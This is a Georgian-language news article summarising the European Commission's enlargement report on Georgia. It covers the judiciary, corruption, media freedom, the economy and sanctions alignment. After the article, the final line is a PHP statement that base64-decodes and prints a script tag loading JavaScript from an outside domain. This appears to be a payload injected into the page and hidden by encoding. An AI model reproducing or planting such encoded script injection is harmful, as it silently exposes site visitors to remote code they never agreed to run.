celsiusi
ავერსი შნაიდერი

ევროკომისიამ ევროკავშირის გაფართოების ყოველწლიური ანგარიში გამოაქვეყნა, რომელშიც საქართველოს მიერ მიღწეული პროგრესია შეფასებული.

დოკუმენტში დეტალურად არის აღწერილი საქართველოს მიერ ევროკავშირის კანონმდებლობასთან დაახლოების კუთხით გადადგმული ნაბიჯები, ჩამოთვლილია ის სფეროები, სადაც ქვეყანამ წარმატებას მიაღწია და სადაც პრობლემები ჯერ კიდევ რჩება.

აღნიშნული ანაგარიში ევროკომისიამ თან დაურთო რეკომენდაციას, რომლითაც ევროპულ საბჭოს მიმართა და საქართველოსთვის ევროკავშირის წევრობის კანდიდატის სტატუსის მინიჭებას მხარი დაუჭირა.

პოლიტიკური კრიტერიუმები

საერთო ჯამში, საკანონმდებლო ჩარჩო, ინსტიტუციური მოწყობა და აქტიური სამოქალაქო საზოგადოება ანიჭებს საქართველოს გარკვეული დონის მომზადებას შემდგომი დემოკრატიული და კანონის უზენაესობის რეფორმებისთვის. მიუხედავად ამისა, რეფორმების პროცესს ჰქონდა დაბრკოლებები პოლიტიკური დაძაბულობის, ღრმა პოლარიზაციის, პოლიტიკურ პარტიებს შორის კონსტრუქციული თანამშრომლობის არარსებობის სახით და გამოწვევით ეროვნული ინტერესების მქონე მთავარ საკითხებზე კონსენსუსის მიღწევის კუთხით.

პარტიათაშორისმა დაძაბულობამ მმართველ პარტიასა და ოპოზიციას შორის, ისევე როგორც შეზღუდულმა კონსულტაციებმა სამოქალაქო საზოგადოებასთან, ზეგავლენა მოახდინა გადაწყვეტილების მიღების პროცესებზე და რეფორმების იმპლემენტაციაზე. პარლამენტი ედგა სათავეში ევროკომისიის მიერ გაწერილი 12 რეკომენდაციის შესრულების ძალისხმევას და 2022 წლის ივლისში ჩამოაყალიბა სამუშაო ჯგუფები, რომ საჭირო რეფორმებზე დებატები გამართულიყო.

პარტიათაშორისი არსებითი სამუშაო პარლამენტში შეფერხებული იყო, როგორც მმართველი პარტიის მიერ ოპოზიციის შეზღუდული ჩართვით კანონმდებლობის მომზადების პროცესში, ისევე ოპოზიციის ნაწილის ბოიკოტებით. მიუხედავად ამისა, პარტიებს შორის თანამშრომლობისა და კენჭისყრის კარგი მაგალითები მაინც იყო, მათ შორის პარლამენტის წესებსა და პროცედურებში შესწორებების საკითხზე, რომლებიც მიღებული იყო 2022 წლის ნოემბერში, რათა ზომიერად გაზრდილიყო საპარლამენტო ზედამხედველობის დონე.

ევროკავშირში ინტეგრაციის გზაზე კრიტიკულად მნიშვნელოვანი კანონები იყო მიღებული პარლამენტში 2023 წლის მეორე და მესამე კვარტალში და ეს მოხდა საერთო ჯამში შეზღუდული კონსულტაციებით, საფუძვლიანი ანალიზის გარეშე, თუ რამდენად შესაბამისობაში იყო ეს კანონები ევროკავშირის ან ევროპის საბჭოს სტანდარტებთან. მაშინ, როდესაც 12 პრიორიტეტზე მუშაობის უმეტესობა პარლამენტში მიმდინარეობდა,  მთავრობის ქმედებებს, გაეძლიერებინა რეფორმების პროცესი და განემტკიცებინა კარგი მმართველობა, შეზღუდული პროგრესი ჰქონდა ზოგიერთ რეფორმასთან დაკავშირებით და გარკვეული პროგრესი სხვა რეფორმებში. პრეზიდენტმა დაადო ვეტო ზოგიერთ კანონს, რომელიც მისი შეფასებით ეწინააღმდეგებოდა ქვეყნის ევროპული ინტეგრაციის პროცესს.

სამოქალაქო საზოგადოება არის კარგად განვითარებული, მრავალფეროვანი, აქტიური და აგრძელებს თავისუფლად ოპერირებას. სამოქალაქო საზოგადოების ჩართულობა გადაწყვეტილების მიღების პროცესში, რაც თავდაპირველად წინ წაწია პარლამენტმა სამოქალაქო საზოგადოების 12 პრიორიტეტზე მომუშავე ჯგუფებში ჩართვით, დაზიანდა 2022 წლის მარტში შემუშავებული კანონპროექტით, რომელიც უცხოელი ზეგავლენის აგენტების რეესტრის შექმნას ითვალისწინებდა.

კანონპროექტმა, რომელიც საბოლოოდ უკან იყო გაწვეული თბილისში გამართული ხალხმრავალი პროტესტებისა და ძლიერი საერთაშორისო რეაგირების ფონზე, დათესა უნდობლობა სამოქალაქო საზოგადოებაში მრავრობის მიმართ და გამოიწვია მნიშვნელოვან რეფორმებზე კონსულტაციების ბოიკოტირება. ეს ასე დარჩა კანონის უკან გაწვევის შემდეგაც, თუმცა მთავრობამ და პარლამენტმა გამართეს ორი კონფერენცია სამოქალაქო საზოგადოებასთან 25 ივლისს და 13 სექტემბერს, რათა განეახლებინათ კარგი თანამშრომლობა და დაანონსეს სამოქალაქო საზოგადოების ორგანიზაციებთან საკოორდინაციო შეხვედრების გაგრძელება.

2023 წლის სექტემბერში პარლამენტის თავმჯომარე გახდა ღია მმართველობის შესახებ მომუშავე მუდმივი საპარლამენტო საბჭოს თავმჯდომარე.

2023 წლის ოქტომბერში ხელი მოეწერა თანაშმრომლობის მემორანდუმს საქართველოს პარლამენტსა და აღმოსავლეთ პარტნიორობის სამოქალაქო საზოგადოების ფორუმის საქართველოს ეროვნულ პლატფორმას შორის.

საქართველო ზომიერად არის მომზადებული საჯარო ადმინისტრაციის რეფორმის სფეროში. გარკვეული პროგრესი იყო მიღწეული საჯარო ადმინისტრაციისა და საჯარო ფინანსური მენეჯმენტის სტრატეგიების  მომზადებასა და მიღებაში, მათთან დაკავშირებულ სამოქმედო გეგმებში.

აუცილებელია მარეგულირებელი და პროცედურული საფუძვლები, რათა მტკიცებულებებზე დამყარებული პოლიტიკა ძალაში შევიდეს. საჭიროა ძალისხმევის შენარჩუნება, რათა უზრუნველყოფილი იყო სტაბილური, ანგარიშვალდებული და გამჭვირვალე საჯარო სერვისის სისტემა.

მართლმსაჯულების სისტემა საქართველოში გარკვეულ დონეზეა მომზადებული და შეზღუდული პროგრესია მიღწეული. რაც შეეხება სასამართლო სისტემის ზოგად ფუნქციონირებასა და პოტენციალს, რეფორმების ოთხმა ტალღამ გააუმჯობესა სამართლებრივი ჩარჩო. ზოგიერთი საკანონმდებლო ცვლილება იყო მიღებული, მათ შორის სასამართლოს გადაწყვეტილებების ხელმისაწვდომობის კუთხით, ასევე მოსამართლეების დანიშნვნის დასაბუთების ხარისხის გაუმჯობესების კუთხით და უზენაესი მოსამართლის კანდიდატებისთვის აუცილებელ მოთხოვნად სულ მცირე 10-წლიანი პროფესიული გამოცდილების განსაზღვრით. 2023 წლის ივნისში პარლამენტმა მიიღო შესწორება „საერთო სასამართლოების შესახებ“ კანონში და დამატებითი შესწორებები მოამზადა 2023 წლის სექტემბერში, რომლებიც ვენეციის კომისიის ზოგიერთი რეკომენდაციის რეალიზაციას ახდენს, მათ შორის მოსამართლეების უფლებამოსილების შეჩერება და მოსამართლის დისციპლინარული პასუხიმგებლობის საფუძვლების შეზღუდვა. თუმცა, ეს ამ შესწორებებში არ იყო გათვალისწინებული ვენეციის კომისიის ყველაზე მნიშვნელოვანი რეკომენდაციები, რომლებიც ეხება იუსტიციის უმაღლესი საბჭოს რეფორმას და ასევე, უზენაესი სასამართლოს გადაწყვეტილებების სავალდებულო ხასიათს. კერძოდ, რაც ეხება უზენაესი სასამართლოს მოსამართლეების შერჩევის პროცესში იუსტიციის უმაღლესი საბჭოს გადაწყვეტილების გასაჩივრებას.

კონკრეტულად კი, შემდგომი უფრო ფართო რეფორმები, რათა უზრუნველუყოფილი იყოს სასამართლო და საპროკურორო დაწესებულებების სრული დამოუკიდებლობა, ანგარიშვალდებულება და მიუკერძოებლობა, განსაკუთრებით ეს ეხება იუსტიციის უმაღლეს საბჭოს, რომელიც უნდა შეესაბამებოდეს ევროპულ სტანდარტებს და ვენეციის კომიისიის რეკომენდაციებს. კერძოდ, საჭიროა გაუმჯობესება და დამატებითი გარანტიები, რომლებიც ეხება იუსტიციის უმაღლესი საბჭოს ფუნქციონირებას და უფლებამოსილებას. ასევე, უნდა იყოს უზრუნველყოფილი უზენაესი სასამართლოს მოსამართლეების არჩევის პროცესში გასაჩივრების ეფექტურობა, რაც უნდა მოხდეს იუსტიციის უმაღლესი საბჭოსთვის განმარტებით, რომ უზენაესი სასამართლოს გადაწყვეტილება შესასრულებლად სავალდებულოა. პარლამენტმა იუსტიციის უმაღლესი საბჭოს ორი წევრი ისე აირჩია, რომ არჩევის პროცედურასთან დაკავშირებით გარკვეული შეშფოთება გამოიწვია. და ბოლოს, აცილებლად უნდა იყოს მიღებული შესწორება, რომლითაც გენერალური პროკურორის კანდიდატის წარდგენა უნდა მოხდეს პარლამენტში კავლიფიციური უმრავლესობით.

საქართველომ მიაღწია გარკვეულ პროგრესს კორუფციასთან ბრძოლაში და გარკვეულწილად არის მზად. რეკომენდაციების შესაბამისად შეიქმნა ანტიკორუფციული ბიურო, რომელიც რამდენიმე ანტიკორუფციულ ფუნქციას ითავსებს. ანტიკორუფციულ ბიუროსთან დაკავშირებული კანონმდებლობა ვენეციის კომისიას გადაეგზავნა 2023 წლის სექტემბერში.

საქართვლომ წარადგინა დეოლიგარქიზაციის სამოქმედო გეგმა და გადაუგზვნა ვენეციის კომისიას შეფასებისთვის. ეს სამოქმედო გეგმა დაფუძნებულია ევროკომისიის რეკომენდაციებზე და ვენეციის კომისიის 2023 წლის ივნისის შეფასებაზე, რომ საქართველო უნდა მიჰყვეს სისტემურ მიდგომას, მათ შორის კონკურენციის პოლიტიკის, მედია მრავალფეროვნებასა და პოლიტიკური პარტიების დაფინანსების წესის გამკაცრებაში.

სამოქმედო გეგმა გადამუშავდა ოქტომბერში, განმტკიცდა კოორდინაცია და დასახული იყო ქმედებების უფრო მკაფიო დროის ჩარჩო. კანონპროექტი, რომელიც ითვალისწინებდა „პერსონალურ“ მიდგომას მესამე მოსმენით კენჭისყრისას, პარლამენტმა ჩააგდი. საერთო ჯამში, კორუფციულ საქმეებზე სამართლებრივი დევნა და გამამტყუნებელი განაჩენები 2021 წელთან შედარებით გაზრდილია. შემდგომი ქმედებებია საჭირო, რათა დეოლიგარქიზაციის სამოქმედო გეგმა სრულყოფილი გახდეს და დაიწყოს მისი იმპლემენტაცია, რათა შედგეს გამოძიებების ნუსხა, სამართლებრივი დევნა, სასამართლო გადაწყვეტილებები იყოს გამოტანილი და საბოლოოდ დადგეს განაჩენი კორუფციულ საქმეებზე, განსაკუთრებით კი მაღალ დონეზე და, კონკრეტულად კი პოლიტიკურ, სასამართლო და ეკონომიკურ სფეროებში ფართომასშტაბიანი პირადი ინტერესების გავლენის პრობლემის გადასაჭრელად.

საქართველომ გარკვეულ პროგრესს მიაღწია ორგანიზებულ დანაშაულთან ბრძოლაში და გარკვეულწილად არის მომზადებული. საქართველო მონაწილეობდა ევროკავშირის წევრ ქვეყნებთან და მეზობელ სახელწმიფოებთან ერთად გამართულ ერთობლივ ოპერაციებში. ორგანიზებულ დანაშაულთან ბრძოლის ახალი ეროვნული სტრატეგია, ასევე სამოქმედო გეგმა უკვე ძალაშია. ფულის გათეთრების საწინააღმდეგო კანონმდებლობა ნაწილობრივ ასახავს, როგორც ფინანსური ქმედებების სამუშაო ჯგუფის რეკომენდაციებს, ასევე საერთაშორისო კანონმდებლობას. 2023 წლის ოქტომბერში მთავრობამ დაამტკიცა ფულის გათეთრებისა და ტერორიზმის დაფინანსების საფრთხეების ანგარიში.

ჯერ კიდევ რჩება ევროპის საბჭოს მიერ გაცემული შეუსრულებელი რეკომენდაციები, რომლებიც უნდა შესრულდეს. 2022-2026 წლის ეროვნული კონტრტერორისტული სტრატეგია და შესაბამისი სამოქმედო გეგმა დამტკიცებული იყო 2022 წელს. მეტი ძალისხმევაა საჭირო როგორც სამართალდამცავი ორგანოების კოორდინაციის გასაუმჯობესებლად და ეფექტურობის გასაზრდელად, ისე დანაშაულებთან საბრძოლველად, როგორიცაა ფულის გათეთრება და სხვა ფინანსური დანაშაულებები.

რაც შეეხება ფუნდამენტურ უფლებებს, საქართველოს რატიფიცირებული აქვს ადამიანის უფლებების საერთაშორისო კონვენციებისა და ინსტრუმენტების უმეტესობა და შეესაბამებმა საკუთარ ვალდებულებებს, რაც განსაზღვრულია საერთაშორისო ადამიანის უფლებათა კანონის მიხედვით. 2023 წლის მარტში საქართველომ დაამტკიცა ადამიანის უფლებების დაცვის ეროვნული სტრატეგია. სამოქმედო გეგმის პროექტი შემუშავებული იყო და კონსულტაციებისთვის წარედგინა სამოქალაქო საზოგადოებას. სტრატეგია შეიცავს ზოგიერთ პოზიტიურ ელემენტს, რაც ეხება ეკონომიკურ და სოციალურ უფლებებს. თუმცა, ზოგიერთი მნიშვნელოვანი საკითხი მაინც გადაუჭრელი რჩება. კერძოდ, დისკრიმინაცია სექსუალური ორიენტაციისა და გენდერული იდენტობის ნიშნით და ასევე სასამართლოს დამოუკიდებლობა, ანგარიშვალდებულება და გამჭვირვალობა. შესწორებები უნდა შეესაბამებოდეს ვენეციის კომისიის რეკომენდაციებს, რომლებიც გაცემული იყო 2023 წლის 9 ოქტომბერს.

რაც შეეხება ფუნდამენტური უფლებების დაცვას, სისხლის სამართლის კოდექსში შეტანილი შესწორებები, რომლებიც შეშფოთების მიზეზი გახდა და გააჩინა კითხვები, რამდენად შეესაბამება ეს შესწორებები ევროპულ სტანდარტებს, მიღებული იყო პრეზიდენტის ვეტოს დაძლევით. ეს შესწორბები ჯერ კიდევ უნდა იყოს მოყვანილი შესაბამისობაში 2022 წლის ოქტომბერში ვენეციის კომისიის მიერ გაცემულ რეკომენდაციებთან. პარლამენტმა მიიღო საკანონმდებლო პაკეტი, რომელიც მოიცავს შესწორებებს 11 საკანონმდებლო აქტში, რომლებშიც ნახსენებია ადამიანის უფლებათა ევროპული სასაამრთლო. ახალი სახალხო დამცველი იყო არჩეული 2023 წლის თებერვალში, მათ შორის ოპოზიციის მიერ მიცემული ხმებით. გამოწვევები ჯერ კიდევ რჩება ყველა ფორმის სიძულვილის აღმოფხვრის, დისკრიმინაციასთან ბრძოლისა და უმცირესობების დაცვის ეროვნული სტრატეგიის დამტკიცების კუთხით.

რაც შეეხება გამოხატვის თავისუფლებას, საქართველო არის გარკვეულწილად მომზადებული და მიაღწია შეზღუდულ პროგრესს. გამოხატვის თავისუფლება არის დაცული. საქართველოს პოზიციები მსოფლიო პრესის თავისუფლების ინდექსში გაუმჯობესდა 12 ადგილით. ონლაინ მედიაგარემო არ არის შეზღუდული და ის არის მზარდად მრავალფეროვანი. სამოქალაქო საზოგადოებას აქტიურად შეაქვს წვლილი პოლიტიკურ დიალოგში.

საქართველო აგრძელებს საკუთარი კანონმდებლობის აუდიო ვიზუალური მედია სერვისის დირექტივასთან შესაბამისობაში მოყვანას და ოქტომბერში დაამტკიცა შესაბამისი შესწორებები „მაუწყებლობის შესახებ“ კანონში. ეროვნული მარეგულირებლის, კომუნიკაციების კომისიის  ეფექტური დამოუკიდებლობა ჯერ კიდევ რჩება უზრუნველსაყოფი. პარლამენტი ამჟამად განიხილავს შესწორებებს ამასთან დაკავშირებით. მედიაგარემო დიდწილად პლურალისტულია, მაგრამ ასევე ძალზედ პოლარიზებული და მუშაობს მტრულ გარემოში. საქმიანი და პოლიტიკური ინტერესების გადაკვეთა აგრძელებდა დაბრკოლების შექმნას მედიის დამოუკიდებლობაში.

ადგილი ჰქონდა დაშინებას და ფიზიკურ, თუ ვერბალურ თავდასხმებს მედიის წარმომადგენლებზე. განსაკუთრებით წინასაარჩევნო დემონსტრაციების კონტექსტში. შემდგომი გამოძიება ჯერ არ არის ეფექტური. ხისტი განცხადებები ასევე ისმის მედიის მიმართ მთავრობის მაღალი თანამდებობის პირებისგან.

სასამართლო დევნა და გამოძიება ოპოზიციური მედიის მფლობელების მიმართ გახშირებულია. ბოლო ვერდიქტებს ნეგატიური ეფექტი ჰქონდა კრიტიკულ მედია გაშუქებაზე.

რჩება პრობლემები შეკრების თავისუფლების უფლების განხორციელების კუთხით, განსაკუთრებით ეს ეხება იმ ადამიანებს, რომლებიც განსაკუთრებით დაუცველ სიტუაციაში არიან. ეს მოიცავს მშვიდობიანი პროტესტის უფლებას, რაც გამოჩნდა 2023 წლის ივლისში თბილისი პრაიდის მონაწილეებზე ძალადობრივი თავდასხმისას. 5 ოქტომბერს პარლამენტმა დაჩქარებული წესით, წინასწარი კონსულტაციების გარეშე მიიღო შესწორებები შეკრებების შესახებ კანონში. სამოქალაქო საზოგადოებამ და სახალხო დამცველმა გამოხატეს შეშფოთება ამ კანონთან დაკავშირებით და პრეზიდენტმა მას ვეტო დაადო 17 ოქტომბერს.

საანაგარიშო პერიოდში საქართველომ მიიღო სტრატეგიული დოკუმენტები და კანონმდებლობა გენდერულ თანასწორობაზე, მათ შორის ქალთა წინააღმდეგ გენდერული ნიშნით ძალადობაზე და ოჯახურ ძალადობაზე.

დამტკიცებული კანონების პაკეტით შემოღებული იყო გენდერული ზეგავლენის შეფასება ყველა საკანონმდბელო აქტისთვის და ეს მიზნად ისახავს ევროპის საბჭოს სტამბოლის კონვენციის შესრულების უზრუნველყოფას. „გაუპატიურების“ განსაზღვრება უნდა იყოს შესაბამისობაში სტამბოლის კონვენციასთან. ინსტიტუციურ დონეზე გენდერულ ძალადობაზე რეაგირების ზომები კარგად არის განსაზღვრული და მოქმედებს. თუმცა, დაზარალებულების დაცვის ზომები და მხარდაჭერის მომსახურება მოითხოვს სრულყოფას.

მიგრაციის საკანონმდებლო ჩარჩო ნაწილობრივ არის შესაბამისობაში ევროკავშირის კანონმდებლობასთან, მაგრამ მოითხოვს დამატებით ნაბიჯებს. საქართველომ განამტკიცა მიგრაციის მართვის ინსტიტუციონალური რესურსები და პოტენციალი. საქართველოს ვიზალიბერალიზაციის სისტემა უნდა იყოს გაუმჯობესებული და საკონტროლო მაჩვენებლები უნდა იყოს მიღწეული.

კანონმდებლობა თავშესაფრის მაძიებლების შესახებ შესაბამისობაშია ევროკავშირის კანონმდებლობასთან. თავშესაფრის მინიჭების სისტემა მზარდი ზეწოლის ქვეშ აღმოჩნდა საქართველოში უკრაინელი მიგრანტების ნაკადისა და ჩარჩენილი მიგრანტების საკითხის გამო. სისტემა მოითხოვს შემდგომ განმტკიცებას.

რაც შეეხება ეკონომიკურ კრიტერიუმს, საქართველო ზომიერად არის მომზადებული ფუნქციონალური საბაზრო ეკონომიკის დამკვიდრებისთვის. რეალური მთლიანი შიდა პროდუქტის ზრდა ზედიზედ მეორე წელია, გასცდა 10%-ს, გარე პოზიცია საგრძნობლად გაუმჯობესდა, ინფლაცია ზომიერია, ფისკალური დეფიციტი და სახელმწიფო ვალი მნიშვნელოვნად შემცირდა.

საქართველო ასევე აჩვენებს დამაკმაყოფილებელ შედეგს გონივრული მაკროეკონომიკური პოლიტიკის გატარებაში, ინსტიტუციონალური და ნორმატიული გარემო საერთო ჯამში სახარბიელოა. ევროკავშირის შიგნით კონკურენტულ ზეწოლასა და საბაზრო ძალებთან გამკლავების თვალსაზრისით, საქართველო გარკვეულწილად მომზადებულია. ეკონომიკის სტრუქტურა შედარებით კარგად არის დივერსიფიცირებული, თუმცა აქვს დაბალი ღირებულების მქონე სექტორების დიდი წილი. ევროკავშირი რჩება საქართველოს უდიდეს სავაჭრო პარტნიორად, თუმცა ეს წილი თანდათან მცირდება გეოგრაფიულად ახლომდებარე ეკონომიკების სასარგებლოდ.

რაც შეეხება სახელმწიფო შესყიდვებს, საქართველო გარკვეულ დონეზე არის მომზადებული. კარგი პროგრესი იყო მიღწეული სახელმწიფო შესყიდვების შესახებ ახალი კანონის მიღებაში 2023 წლის თებერვალში. შემდგომი სამუშაო არის საჭირო, რათა საკანონმდებლო ჩარჩო შესაბამისობაში მოვიდეს ევროკავშირის შესყიდვების კანონმდებლობასთან.

სტატისტიკის კუთხით, საქართველოს აქვს გარკვეული მზაობა. შეზღუდული პროგრესი იყო მიღწეული ოფიციალური სტატისტიკის შესახებ ახალი კანონის მიღებით. ადამიანური, ფინანსური, თუ საინფორმაციო ტექნოლოგიური კუთხით საჭიროა მნიშვნელოვანი გაუმჯობესება. საქართველოს აქვს გარკვეული დონის მზაობა ფინანსური კონტროლის სფეროში, სადაც ქვეყანამ ვერ მიაღწია პროგრესს, კერძოდ სახელმწიფო შიდა ფინანსური კონტროლისა და შიდა აუდიტის კუთხით.

კარგი სამეზობლო ურთიერთობისა და რეგიონული თანამშრომლობის კუთხით, საქართველო მოწოდებულია, კანდიდატ ქვეყნებთან, პოტენციურ კანდიდატებთან და მეზობელ ევროკავშირის წევრ ქვეყნებთან ორმხრივი ურთიერთობების გაუმჯობესებისკენ. საქართველო ერთგულია აღმოსავლეთ პარტნიორობის პროგრამის და ჩართულია რეგიონული თანამშრომლობის რამდენიმე ინიციატივაში. საქართველოს აქვს სტრატეგიული პარტნიორობა თურქეთთან და აზერბაიჯანთან. ურთიერთობა მეზობელ ევროკავშირის წევრ ქვეყნებთან, რუმინეთთან და ბულგარეთთან არის კარგი და ფოკუსირებულია შავ ზღვაში დაკავშირებადობაზე.

რაც შეეხება საქართველოს შესაძლებლობას, აიღოს ევროკავშირის წევრი ქვეყნის ვალდებულება, საქართველო განაგრძობს მუშაობას, რათა ბევრ სფეროში ევროკავშირის კანონმდებლობასთან შესაბამისობაში მოვიდეს. საერთო ჯამში იყო გარკვეული პროგრესი.

რაც შეეხება შიდა ბაზარს, საქართველო ზომიერად არის მომზადებული სერვისების დაფუძნებისა და მათი მიწოდების თავისუფლების სფეროში, თუმცა ამ კუთხით საანგარიშო პერიოდში პროგრესი არ იყო დაფიქსირებული. ქვეყანას გარკვეული მზაობა აქვს პროდუქტების თავისუფალი გადაადგილების კუთხით, რაშიც შეზღუდული პროგრესი იყო, და ასევე კომპანიების შესახებ კანონის კუთხით, კერძოდ, აუდიტის განმტკიცებაში. საქართველო მზაობის ადრეულ ეტაპზეა, როდესაც საქმე ეხება მუშახელის თავისუფალ გადაადგილებას და ამ მხრივ შეზღუდული პროგრესია მიღწეული. შეზღუდული პროგრესი არის ინტელექტუალური საკუთრების დაცვაშიც, რაც გამოიხატება პატენტის შესახებ კანონის დამტკიცებაში. საქართველოს აქვს გარკვეული მზაობა მომხმარებელთა უფლებებისა და ჯანმრთელობის დაცვაში, სადაც ქვეყანამ შეზღუდულ პროგრესს მიაღწია. კვლავაც მნიშვნელოვანი ძალისხმევაა საჭირო ყველასთვის ხარისხიანი სამედიცინო მომსახურების უზრუნველსაყოფად.

კონკურენციის ეროვნული სააგენტო, რომელიც პასუხისმგებელია მომხმარებელთა უფლებების დაცვის ზომების გატარებაზე, სათანადოდ უნდა იყოს დაკომპლექტებული პერსონალით. კონკურენციის პოლიტიკაში პროგრესი არ არის. საქართველოს სახელმწიფო სააგენტოს კვლავაც არ აქვს ოპერაციული დამოუკიდებლობა. კაპიტალის თავისუფლად გადაადგილების კუთხით იყო შეზღუდული პროგრესი, სადაც საქართველომ უნდა შეასრულოს MONEYVAL-ის რეკომენდაციები.

საქართველოს აქვს გარკვეული მზაობა ფინანსური სერვისების სფეროში და საანგარიშო პერიოდში მხოლოდ შეზღუდულ პროგრესს მიაღწია.

რაც შეეხება კონკურენტუნარიანობას და ინკლუზიურ ზრდას, საქართველო ზომიერად არის მომზადებული ეკონომიკურ და მონეტარულ პოლიტიკაში, ასევე, სამეწარმეო და სამრეწველო პოლიტიკაში, მეცნიერებასა და კვლევაში, განათლებასა და კულტურაში და საბაჟო კავშირის კუთხით. საქართველოს გარკვეული მზაობა აქვს ციფრულ ტრანსფორმაციაში და მედიაში, სოციალურ პოლიტიკასა და დასაქმებაში, ასევე ზომიერ დონეზეა მომზადებული გადასახადების სფეროშიც. ქვეყანამ გარკვეულ პროგრესს მიაღწია ციფრულ ტრანსფორმაციასა და მედიაში, ასევე საგადასახადო სფეროში, მეცნიერებასა და კვლევაში. საქართველომ შეზღუდული პროგრესი აჩვენა სამეწარმეო და სამრეწველო პოლიტიკაში.

რაც შეეხება მწვანე დღის წესრიგს და მდგრად დაკავშირებადობას, საქართველო მზაობის ადრეულ ეტაპზეა გარემოსა და კლიმატის ცვლილებების პოლიტიკაში. საქართველომ დაასრულა მუშაობა ემისიების შემცირების განვითარების გრძელვადიან სტრატეგიაზე. ქვეყანას აქვს გარკვეული მზაობა ენერგიის, სატრანსპორტო პოლიტიკისა და ტრანს-ევროპული ქსელების კუთხით.

რაც შეეხება საგარეო ურთიერთობებს, საქართველო ზომიერად არის მომზადებული. ამ კუთხით შეზღუდული პროგრესი იყო ნაჩვენები, სადაც მოსალოდნელია, რომ საქართველო ევროკავშირის კანონმდებლობასთან შესაბამისობაში მოიყვანს ორმაგი დანიშნულების პროდუქტების ექსპორტის კონტროლის კანონმდებლობას. შეზღუდული პროგრესი იყო მიღწეული საგარეო, უსაფრთხოების და თავდაცვის პოლიტიკაში. ქვეყანაში უკვე დიდი ხნის განმავლობაში მოქმედი პოლიტიკის შესაბამისად, საქართველო არ შეუერთდა ევროკავშირის სანქციებს რუსეთის წინააღდმეგ, მათ შორის არ დახურა საჰაერო სივრცე.

საერთო საგარეო და უსაფრთხოების პოლიტიკის სფეროში, რუსეთის მიერ უკრაინის წინააღმდეგ დაწყებული ომის აგრესიის შემდეგ, საქართველო თანხვედრაში მოვიდა საერთაშორისო და ევროკავშირის ინიციატივებთან უკრაინის მხარდასაჭერად, მათ შორის შეუერთდა გაერო-ს გენერალური ასამბლეის, ადამიანის უფლებთა საბჭოს და ევროპის საბჭოს რეზოლუციებს. საქართველო არ მოვიდა თანხვედრაში ევროკავშირის შემზღუდავ ზომებთან, რომელიც ევროკავშირმა დაუწესა რუსეთს და ბელარუსს, არ შეუერთდა ევროკავშირის უმაღლესი კომისრის შესაბამის განცხადებებს. საქართველოს შესაბამისობა ევროკავშირის განცხადებებთან და ევროკავშირის საბჭოს გადაწყვეტილებებთან დიდწილად ერთ დონეზე დარჩა ( 2022 წელს – 44%, 2023 წელს 43%). არსებობს მოლოდინი, რომ საქართველო მნიშვნელოვანწილად გაზრდის თანხვედრას ევროკავშირის განცხადებებთან და ევროკავშირის საბჭოს გადაწყვეტილებებთან. საქართველომ აჩვენა, რომ აქტიურად თანამშრომლობს, რათა უზრუნველყოფილი იყოს, რომ საქართველოს ტერიტორია ან საქართველოში დარეგისტრირებული იურიდიული პირები, არ არიან გამოყენებული ევროკავშირის სანქციების გვერდის ავლისთვის, მათ შორის ფინანსურ სექტორში.

531
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");